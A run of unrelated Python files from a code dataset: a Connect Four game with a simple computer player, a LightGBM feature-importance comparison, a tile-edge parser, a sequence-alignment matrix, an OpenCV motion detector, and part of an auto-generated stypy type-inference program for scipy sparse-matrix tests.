D[i + 2][j+2] == ox and \
D[i + 3][j+3] == ox:
return True
for row in range(0,H-3):
for col in range(3,W):
if D[row][col] == ox and \
D[row + 1][col - 1] == ox and \
D[row + 2][col - 2] == ox and \
D[row + 3][col - 3] == ox:
return True
return False
def hostGame(self,player):
x=True
v=False
while v==False:
if x==True:
print "X's Move"
c=input(int)
if self.allowsMove(c):
self.addMove(c,'X')
v=self.winsFor('X')
x=False
if x==False:
print "O's Move"
c=player.tiebreakMove(self)
if self.allowsMove(c):
self.addMove(c,'O')
v=self.winsFor('O')
x=True
print self
class Player:
def __init__(self, ox, tbt, ply):
self.ox=ox
self.tbt=tbt
self.ply=ply
def __repr__(self):
""" creates an appropriate string """
s = "Player for " + self.ox + "\n"
s += " with tiebreak type: " + self.tbt + "\n"
s += " and ply == " + str(self.ply) + "\n\n"
return s
def opp(self):
if self.ox=='X':
return 'O'
elif self.ox=='O':
return 'X'
def scoreBoard(self, Board):
z=self.opp()
if Board.winsFor(self.ox)==True:
return 100
elif Board.winsFor(z)==True:
return 0
elif Board.isFull()==True:
return 1
else:
return 50
def findScore(self,Board):
scores=[]
for Col in range(0,Board.width):
b=Board
b.addMove(Col,self.ox)
scores.append(self.scoreBoard(Board))
return scores
def highScores(self,scores,board):
k=[]
b=0
for i in range(0,len(scores)):
if scores[i]>b and self.foresight(board,i):
b=scores[i]
k=[]
k.append(i)
elif scores[i]==b and self.foresight(board,i):
k.append(i)
return k
def tiebreakMove(self,board):
scores=self.findScore(board)
high=self.highScores(scores,board)
q=len(high)-1
if self.tbt =='LEFT':
return high[0]
elif self.tbt=='RIGHT':
return high[q]
else:
return high[randint(0,q)]
# checks to see if move will lead to an immediate loss
def foresight(self, board ,c):
l=Board(0,0)
for i in range(0,board.width):
l = board.addMove(c, self.ox)
l.addMove(self,i,self.opp)
if l.scoreBoard(self)==0:
return False
else:
return True
def nextMove(self,board):
return self.tiebreakMove(board)
|
991,615 | 1b33580bdf91373cb33e760928618b529bccbf19 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 25 00:21:12 2018
@author: Kazuki
"""
import pandas as pd
imp_2 = pd.read_csv('/Users/Kazuki/Downloads/imp_801_imp_lgb_onlyMe.py-2 (2) 0.08.51.csv')
imp_2['split'] /= imp_2['split'].max()
imp_2['gain'] /= imp_2['gain'].max()
imp_2['total'] = imp_2['split'] + imp_2['gain']
imp_2.sort_values('total', ascending=False, inplace=True)
imp_2.set_index('feature', inplace=True)
imp_3 = pd.read_csv('/Users/Kazuki/Downloads/imp_801_imp_lgb_onlyMe.py-2 (3).csv')
imp_3['split'] /= imp_3['split'].max()
imp_3['gain'] /= imp_3['gain'].max()
imp_3['total'] = imp_3['split'] + imp_3['gain']
imp_3.sort_values('total', ascending=False, inplace=True)
imp_3.set_index('feature', inplace=True)
imp = imp_2.total.rank(ascending=False).to_frame()
imp['total3'] = imp_3.total.rank(ascending=False)
imp['diff'] = abs(imp.total - imp.total3)
imp_ = imp[imp.total<=700]
imp_ = imp_[imp_.total3>700]
|
991,616 | f19653a5fc1ecf6d5c3b258efd6fc1ce3ea885e6 | #!/usr/bin/python3
import sys
import re
# AB BA CD BA
# CD DC AB DC
# CA AC DB BD
# DB BD CA AC
# Each pattern has 8 patterns
# Rotate 90° or not, flip X or not, flip Y or not
# 2³=8
class Tile:
def _parse_line(line):
return int(line.replace('.', '0').replace('#', '1'), 2)
def __init__(self, id, lines):
self.id = id
self.edges = [
# Top
Tile._parse_line(lines[0]),
# Right
Tile._parse_line(''.join(x[-1] for x in lines)),
# Bottom
Tile._parse_line(lines[-1]),
# Left
Tile._parse_line(''.join(x[0] for x in lines))
]
def get_tiles(lines):
num = None
grid = []
for line in lines:
line = line.rstrip()
if num is None:
num = int(re.match(r'Tile ([0-9]+):$', line).group(1))
elif len(line) == 0:
yield Tile(num, grid)
num = None
grid.clear()
else:
grid.append(line)
for x in next(get_tiles(sys.stdin)).edges:
print(bin(x))
|
991,617 | a5dbde761cfc4763634c73997043fd9cc9085468 | import numpy as np
def score(a,b):
if a == b : return 1
else : return -1
seq1 = "ATTACA"
seq2 = "ATGCT"
matrix = np.zeros((len(seq2)+1,len(seq1)+1))
gap = -1
for i in range(len(seq2)+1) :
matrix[i][0] = gap * i
for i in range(len(seq1)+1) :
matrix[0][i] = gap * i
for i in range(1,len(seq2)+1):
for j in range(1,len(seq1)+1):
match = matrix[i-1][j-1] + score(seq1[j-1],seq2[i-1])
deletion = matrix[i-1][j] + gap
insertion = matrix[i][j-1] + gap
matrix[i][j] = max(match,deletion,insertion)
print(matrix) |
991,618 | 8a5f41e1f7a7da5a9202cbf2e99b571c9c099e6f | import cv2
import argparse
import numpy as np
capt = cv2.VideoCapture('test.mp4')
frame_width = int(capt.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height =int(capt.get(cv2.CAP_PROP_FRAME_HEIGHT))
#Parte do código para o background subtraction
parser = argparse.ArgumentParser(description='Movement Detector.')
parser.add_argument('--input', type=str, help='Caminho para o vídeo.', default='test.mp4')
parser.add_argument('--algo', type=str, help='Método da subtração de fundo.', default='MOG2')
args = parser.parse_args()
#Verifica o método do background subtraction
if args.algo == 'MOG2':
bS = cv2.createBackgroundSubtractorMOG2() #guassiana de segmentação
else:
bS = cv2.createBackgroundSubtractorKNN() #vizinho proximo
capture = cv2.VideoCapture(cv2.samples.findFileOrKeep(args.input))
ret, quadro1 = capt.read()
print(quadro1.shape)
while capt.isOpened():
ret, quadro = capture.read()
if quadro is None:
break
bw = bS.apply(quadro)
cv2.rectangle(quadro, (10, 2), (100, 20), (255, 255, 255), -1)
cv2.putText(quadro, str(capture.get(cv2.CAP_PROP_POS_FRAMES)), (15, 15),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))
diff = cv2.absdiff(quadro1, quadro)
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#Cria o contorno do retângulo quando detecta o movimento
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 900:
continue
cv2.rectangle(quadro1, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow("Movement Detection", quadro1)
cv2.imshow('Background', bw)
quadro1 = quadro
ret, quadro = capt.read()
keyboard = cv2.waitKey(30)
if keyboard == 'q' or keyboard == 27:
break
|
991,619 | 50005677fd04d15701563a69a9d29b5b1074d466 |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: from __future__ import division, print_function, absolute_import
2:
3: import numpy as np
4: from numpy.testing import assert_array_almost_equal, assert_
5: from scipy.sparse import csr_matrix
6:
7:
8: def _check_csr_rowslice(i, sl, X, Xcsr):
9: np_slice = X[i, sl]
10: csr_slice = Xcsr[i, sl]
11: assert_array_almost_equal(np_slice, csr_slice.toarray()[0])
12: assert_(type(csr_slice) is csr_matrix)
13:
14:
15: def test_csr_rowslice():
16: N = 10
17: np.random.seed(0)
18: X = np.random.random((N, N))
19: X[X > 0.7] = 0
20: Xcsr = csr_matrix(X)
21:
22: slices = [slice(None, None, None),
23: slice(None, None, -1),
24: slice(1, -2, 2),
25: slice(-2, 1, -2)]
26:
27: for i in range(N):
28: for sl in slices:
29: _check_csr_rowslice(i, sl, X, Xcsr)
30:
31:
32: def test_csr_getrow():
33: N = 10
34: np.random.seed(0)
35: X = np.random.random((N, N))
36: X[X > 0.7] = 0
37: Xcsr = csr_matrix(X)
38:
39: for i in range(N):
40: arr_row = X[i:i + 1, :]
41: csr_row = Xcsr.getrow(i)
42:
43: assert_array_almost_equal(arr_row, csr_row.toarray())
44: assert_(type(csr_row) is csr_matrix)
45:
46:
47: def test_csr_getcol():
48: N = 10
49: np.random.seed(0)
50: X = np.random.random((N, N))
51: X[X > 0.7] = 0
52: Xcsr = csr_matrix(X)
53:
54: for i in range(N):
55: arr_col = X[:, i:i + 1]
56: csr_col = Xcsr.getcol(i)
57:
58: assert_array_almost_equal(arr_col, csr_col.toarray())
59: assert_(type(csr_col) is csr_matrix)
60:
61:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 3, 0))
# 'import numpy' statement (line 3)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459657 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'numpy')
if (type(import_459657) is not StypyTypeError):
if (import_459657 != 'pyd_module'):
__import__(import_459657)
sys_modules_459658 = sys.modules[import_459657]
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'np', sys_modules_459658.module_type_store, module_type_store)
else:
import numpy as np
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'np', numpy, module_type_store)
else:
# Assigning a type to the variable 'numpy' (line 3)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 3, 0), 'numpy', import_459657)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 4, 0))
# 'from numpy.testing import assert_array_almost_equal, assert_' statement (line 4)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459659 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing')
if (type(import_459659) is not StypyTypeError):
if (import_459659 != 'pyd_module'):
__import__(import_459659)
sys_modules_459660 = sys.modules[import_459659]
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', sys_modules_459660.module_type_store, module_type_store, ['assert_array_almost_equal', 'assert_'])
nest_module(stypy.reporting.localization.Localization(__file__, 4, 0), __file__, sys_modules_459660, sys_modules_459660.module_type_store, module_type_store)
else:
from numpy.testing import assert_array_almost_equal, assert_
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', None, module_type_store, ['assert_array_almost_equal', 'assert_'], [assert_array_almost_equal, assert_])
else:
# Assigning a type to the variable 'numpy.testing' (line 4)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', import_459659)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 5, 0))
# 'from scipy.sparse import csr_matrix' statement (line 5)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459661 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse')
if (type(import_459661) is not StypyTypeError):
if (import_459661 != 'pyd_module'):
__import__(import_459661)
sys_modules_459662 = sys.modules[import_459661]
import_from_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', sys_modules_459662.module_type_store, module_type_store, ['csr_matrix'])
nest_module(stypy.reporting.localization.Localization(__file__, 5, 0), __file__, sys_modules_459662, sys_modules_459662.module_type_store, module_type_store)
else:
from scipy.sparse import csr_matrix
import_from_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', None, module_type_store, ['csr_matrix'], [csr_matrix])
else:
# Assigning a type to the variable 'scipy.sparse' (line 5)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', import_459661)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
@norecursion
def _check_csr_rowslice(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function '_check_csr_rowslice'
module_type_store = module_type_store.open_function_context('_check_csr_rowslice', 8, 0, False)
# Passed parameters checking function
_check_csr_rowslice.stypy_localization = localization
_check_csr_rowslice.stypy_type_of_self = None
_check_csr_rowslice.stypy_type_store = module_type_store
_check_csr_rowslice.stypy_function_name = '_check_csr_rowslice'
_check_csr_rowslice.stypy_param_names_list = ['i', 'sl', 'X', 'Xcsr']
_check_csr_rowslice.stypy_varargs_param_name = None
_check_csr_rowslice.stypy_kwargs_param_name = None
_check_csr_rowslice.stypy_call_defaults = defaults
_check_csr_rowslice.stypy_call_varargs = varargs
_check_csr_rowslice.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, '_check_csr_rowslice', ['i', 'sl', 'X', 'Xcsr'], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, '_check_csr_rowslice', localization, ['i', 'sl', 'X', 'Xcsr'], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of '_check_csr_rowslice(...)' code ##################
# Assigning a Subscript to a Name (line 9):
# Obtaining the type of the subscript
# Obtaining an instance of the builtin type 'tuple' (line 9)
tuple_459663 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 9, 17), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 9)
# Adding element type (line 9)
# Getting the type of 'i' (line 9)
i_459664 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 17), 'i')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 9, 17), tuple_459663, i_459664)
# Adding element type (line 9)
# Getting the type of 'sl' (line 9)
sl_459665 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 20), 'sl')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 9, 17), tuple_459663, sl_459665)
# Getting the type of 'X' (line 9)
X_459666 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 15), 'X')
# Obtaining the member '__getitem__' of a type (line 9)
getitem___459667 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 9, 15), X_459666, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 9)
subscript_call_result_459668 = invoke(stypy.reporting.localization.Localization(__file__, 9, 15), getitem___459667, tuple_459663)
# Assigning a type to the variable 'np_slice' (line 9)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 9, 4), 'np_slice', subscript_call_result_459668)
# Assigning a Subscript to a Name (line 10):
# Obtaining the type of the subscript
# Obtaining an instance of the builtin type 'tuple' (line 10)
tuple_459669 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 10, 21), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 10)
# Adding element type (line 10)
# Getting the type of 'i' (line 10)
i_459670 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 21), 'i')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 10, 21), tuple_459669, i_459670)
# Adding element type (line 10)
# Getting the type of 'sl' (line 10)
sl_459671 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 24), 'sl')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 10, 21), tuple_459669, sl_459671)
# Getting the type of 'Xcsr' (line 10)
Xcsr_459672 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 16), 'Xcsr')
# Obtaining the member '__getitem__' of a type (line 10)
getitem___459673 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 10, 16), Xcsr_459672, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 10)
subscript_call_result_459674 = invoke(stypy.reporting.localization.Localization(__file__, 10, 16), getitem___459673, tuple_459669)
# Assigning a type to the variable 'csr_slice' (line 10)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 10, 4), 'csr_slice', subscript_call_result_459674)
# Call to assert_array_almost_equal(...): (line 11)
# Processing the call arguments (line 11)
# Getting the type of 'np_slice' (line 11)
np_slice_459676 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 30), 'np_slice', False)
# Obtaining the type of the subscript
int_459677 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 11, 60), 'int')
# Call to toarray(...): (line 11)
# Processing the call keyword arguments (line 11)
kwargs_459680 = {}
# Getting the type of 'csr_slice' (line 11)
csr_slice_459678 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 40), 'csr_slice', False)
# Obtaining the member 'toarray' of a type (line 11)
toarray_459679 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 11, 40), csr_slice_459678, 'toarray')
# Calling toarray(args, kwargs) (line 11)
toarray_call_result_459681 = invoke(stypy.reporting.localization.Localization(__file__, 11, 40), toarray_459679, *[], **kwargs_459680)
# Obtaining the member '__getitem__' of a type (line 11)
getitem___459682 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 11, 40), toarray_call_result_459681, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 11)
subscript_call_result_459683 = invoke(stypy.reporting.localization.Localization(__file__, 11, 40), getitem___459682, int_459677)
# Processing the call keyword arguments (line 11)
kwargs_459684 = {}
# Getting the type of 'assert_array_almost_equal' (line 11)
assert_array_almost_equal_459675 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'assert_array_almost_equal', False)
# Calling assert_array_almost_equal(args, kwargs) (line 11)
assert_array_almost_equal_call_result_459685 = invoke(stypy.reporting.localization.Localization(__file__, 11, 4), assert_array_almost_equal_459675, *[np_slice_459676, subscript_call_result_459683], **kwargs_459684)
# Call to assert_(...): (line 12)
# Processing the call arguments (line 12)
# Call to type(...): (line 12)
# Processing the call arguments (line 12)
# Getting the type of 'csr_slice' (line 12)
csr_slice_459688 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 17), 'csr_slice', False)
# Processing the call keyword arguments (line 12)
kwargs_459689 = {}
# Getting the type of 'type' (line 12)
type_459687 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 12), 'type', False)
# Calling type(args, kwargs) (line 12)
type_call_result_459690 = invoke(stypy.reporting.localization.Localization(__file__, 12, 12), type_459687, *[csr_slice_459688], **kwargs_459689)
# Getting the type of 'csr_matrix' (line 12)
csr_matrix_459691 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 31), 'csr_matrix', False)
# Applying the binary operator 'is' (line 12)
result_is__459692 = python_operator(stypy.reporting.localization.Localization(__file__, 12, 12), 'is', type_call_result_459690, csr_matrix_459691)
# Processing the call keyword arguments (line 12)
kwargs_459693 = {}
# Getting the type of 'assert_' (line 12)
assert__459686 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'assert_', False)
# Calling assert_(args, kwargs) (line 12)
assert__call_result_459694 = invoke(stypy.reporting.localization.Localization(__file__, 12, 4), assert__459686, *[result_is__459692], **kwargs_459693)
# ################# End of '_check_csr_rowslice(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function '_check_csr_rowslice' in the type store
# Getting the type of 'stypy_return_type' (line 8)
stypy_return_type_459695 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 8, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459695)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function '_check_csr_rowslice'
return stypy_return_type_459695
# Assigning a type to the variable '_check_csr_rowslice' (line 8)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 8, 0), '_check_csr_rowslice', _check_csr_rowslice)
@norecursion
def test_csr_rowslice(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function 'test_csr_rowslice'
module_type_store = module_type_store.open_function_context('test_csr_rowslice', 15, 0, False)
# Passed parameters checking function
test_csr_rowslice.stypy_localization = localization
test_csr_rowslice.stypy_type_of_self = None
test_csr_rowslice.stypy_type_store = module_type_store
test_csr_rowslice.stypy_function_name = 'test_csr_rowslice'
test_csr_rowslice.stypy_param_names_list = []
test_csr_rowslice.stypy_varargs_param_name = None
test_csr_rowslice.stypy_kwargs_param_name = None
test_csr_rowslice.stypy_call_defaults = defaults
test_csr_rowslice.stypy_call_varargs = varargs
test_csr_rowslice.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'test_csr_rowslice', [], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'test_csr_rowslice', localization, [], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'test_csr_rowslice(...)' code ##################
# Assigning a Num to a Name (line 16):
int_459696 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 16, 8), 'int')
# Assigning a type to the variable 'N' (line 16)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 16, 4), 'N', int_459696)
# Call to seed(...): (line 17)
# Processing the call arguments (line 17)
int_459700 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 17, 19), 'int')
# Processing the call keyword arguments (line 17)
kwargs_459701 = {}
# Getting the type of 'np' (line 17)
np_459697 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 17, 4), 'np', False)
# Obtaining the member 'random' of a type (line 17)
random_459698 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 17, 4), np_459697, 'random')
# Obtaining the member 'seed' of a type (line 17)
seed_459699 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 17, 4), random_459698, 'seed')
# Calling seed(args, kwargs) (line 17)
seed_call_result_459702 = invoke(stypy.reporting.localization.Localization(__file__, 17, 4), seed_459699, *[int_459700], **kwargs_459701)
# Assigning a Call to a Name (line 18):
# Call to random(...): (line 18)
# Processing the call arguments (line 18)
# Obtaining an instance of the builtin type 'tuple' (line 18)
tuple_459706 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 26), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 18)
# Adding element type (line 18)
# Getting the type of 'N' (line 18)
N_459707 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 26), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 18, 26), tuple_459706, N_459707)
# Adding element type (line 18)
# Getting the type of 'N' (line 18)
N_459708 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 29), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 18, 26), tuple_459706, N_459708)
# Processing the call keyword arguments (line 18)
kwargs_459709 = {}
# Getting the type of 'np' (line 18)
np_459703 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 8), 'np', False)
# Obtaining the member 'random' of a type (line 18)
random_459704 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 8), np_459703, 'random')
# Obtaining the member 'random' of a type (line 18)
random_459705 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 8), random_459704, 'random')
# Calling random(args, kwargs) (line 18)
random_call_result_459710 = invoke(stypy.reporting.localization.Localization(__file__, 18, 8), random_459705, *[tuple_459706], **kwargs_459709)
# Assigning a type to the variable 'X' (line 18)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 18, 4), 'X', random_call_result_459710)
# Assigning a Num to a Subscript (line 19):
int_459711 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 19, 17), 'int')
# Getting the type of 'X' (line 19)
X_459712 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 19, 4), 'X')
# Getting the type of 'X' (line 19)
X_459713 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 19, 6), 'X')
float_459714 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 19, 10), 'float')
# Applying the binary operator '>' (line 19)
result_gt_459715 = python_operator(stypy.reporting.localization.Localization(__file__, 19, 6), '>', X_459713, float_459714)
# Storing an element on a container (line 19)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 19, 4), X_459712, (result_gt_459715, int_459711))
# Assigning a Call to a Name (line 20):
# Call to csr_matrix(...): (line 20)
# Processing the call arguments (line 20)
# Getting the type of 'X' (line 20)
X_459717 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 22), 'X', False)
# Processing the call keyword arguments (line 20)
kwargs_459718 = {}
# Getting the type of 'csr_matrix' (line 20)
csr_matrix_459716 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 11), 'csr_matrix', False)
# Calling csr_matrix(args, kwargs) (line 20)
csr_matrix_call_result_459719 = invoke(stypy.reporting.localization.Localization(__file__, 20, 11), csr_matrix_459716, *[X_459717], **kwargs_459718)
# Assigning a type to the variable 'Xcsr' (line 20)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 20, 4), 'Xcsr', csr_matrix_call_result_459719)
# Assigning a List to a Name (line 22):
# Obtaining an instance of the builtin type 'list' (line 22)
list_459720 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 13), 'list')
# Adding type elements to the builtin type 'list' instance (line 22)
# Adding element type (line 22)
# Call to slice(...): (line 22)
# Processing the call arguments (line 22)
# Getting the type of 'None' (line 22)
None_459722 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 20), 'None', False)
# Getting the type of 'None' (line 22)
None_459723 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 26), 'None', False)
# Getting the type of 'None' (line 22)
None_459724 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 32), 'None', False)
# Processing the call keyword arguments (line 22)
kwargs_459725 = {}
# Getting the type of 'slice' (line 22)
slice_459721 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 14), 'slice', False)
# Calling slice(args, kwargs) (line 22)
slice_call_result_459726 = invoke(stypy.reporting.localization.Localization(__file__, 22, 14), slice_459721, *[None_459722, None_459723, None_459724], **kwargs_459725)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459726)
# Adding element type (line 22)
# Call to slice(...): (line 23)
# Processing the call arguments (line 23)
# Getting the type of 'None' (line 23)
None_459728 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 20), 'None', False)
# Getting the type of 'None' (line 23)
None_459729 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 26), 'None', False)
int_459730 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 32), 'int')
# Processing the call keyword arguments (line 23)
kwargs_459731 = {}
# Getting the type of 'slice' (line 23)
slice_459727 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 14), 'slice', False)
# Calling slice(args, kwargs) (line 23)
slice_call_result_459732 = invoke(stypy.reporting.localization.Localization(__file__, 23, 14), slice_459727, *[None_459728, None_459729, int_459730], **kwargs_459731)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459732)
# Adding element type (line 22)
# Call to slice(...): (line 24)
# Processing the call arguments (line 24)
int_459734 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 20), 'int')
int_459735 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 23), 'int')
int_459736 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 27), 'int')
# Processing the call keyword arguments (line 24)
kwargs_459737 = {}
# Getting the type of 'slice' (line 24)
slice_459733 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 24, 14), 'slice', False)
# Calling slice(args, kwargs) (line 24)
slice_call_result_459738 = invoke(stypy.reporting.localization.Localization(__file__, 24, 14), slice_459733, *[int_459734, int_459735, int_459736], **kwargs_459737)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459738)
# Adding element type (line 22)
# Call to slice(...): (line 25)
# Processing the call arguments (line 25)
int_459740 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 20), 'int')
int_459741 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 24), 'int')
int_459742 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 27), 'int')
# Processing the call keyword arguments (line 25)
kwargs_459743 = {}
# Getting the type of 'slice' (line 25)
slice_459739 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 25, 14), 'slice', False)
# Calling slice(args, kwargs) (line 25)
slice_call_result_459744 = invoke(stypy.reporting.localization.Localization(__file__, 25, 14), slice_459739, *[int_459740, int_459741, int_459742], **kwargs_459743)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459744)
# Assigning a type to the variable 'slices' (line 22)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 4), 'slices', list_459720)
# Call to range(...): (line 27)
# Processing the call arguments (line 27)
# Getting the type of 'N' (line 27)
N_459746 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 27, 19), 'N', False)
# Processing the call keyword arguments (line 27)
kwargs_459747 = {}
# Getting the type of 'range' (line 27)
range_459745 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 27, 13), 'range', False)
# Calling range(args, kwargs) (line 27)
